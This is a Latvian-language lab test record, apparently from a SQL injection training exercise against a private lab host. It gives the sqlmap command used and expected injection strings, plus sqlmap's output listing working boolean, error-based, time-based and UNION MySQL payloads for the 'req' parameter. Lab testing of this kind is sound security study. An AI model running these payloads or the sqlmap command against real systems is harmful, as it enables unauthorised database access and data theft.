=================================================================================
1. Īpašība: parameters satur nevis lietotājvārdu, bet daļu no vaicājuma, kas atlasa lietotājvārdu
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?req=username%3d%27hacker%27 or 1=1
3.2. error-based: ?req=username%3d%27hacker%27%27
3.3. time-based: ?req=username%3d%27hacker%27 or sleep(5)
3.4. union: ?req=username%3d%27hacker%27 union select 1,2,3
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 8673662 nanosekundes
6. Palaistā komanda
sqlmap -u "http://192.168.17.134/sqlinjection/example4/?req=username%3d%27hacker%27" -p req --risk=3 --level=5


7. Jautājumi, kurus uzdeva SQLMap
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'req' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: req (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: req=username='hacker' AND 4022=4022

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: req=username='hacker' AND (SELECT 4955 FROM(SELECT COUNT(*),CONCAT(0x717a7a7a71,(SELECT (ELT(4955=4955,1))),0x7170707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: req=username='hacker' OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: req=username='hacker' UNION ALL SELECT CONCAT(0x717a7a7a71,0x59786f706f5a665744617874746470685161726666724d6876736441494867426b4b6c5a50445a4e,0x7170707871),NULL,NULL-- -
---
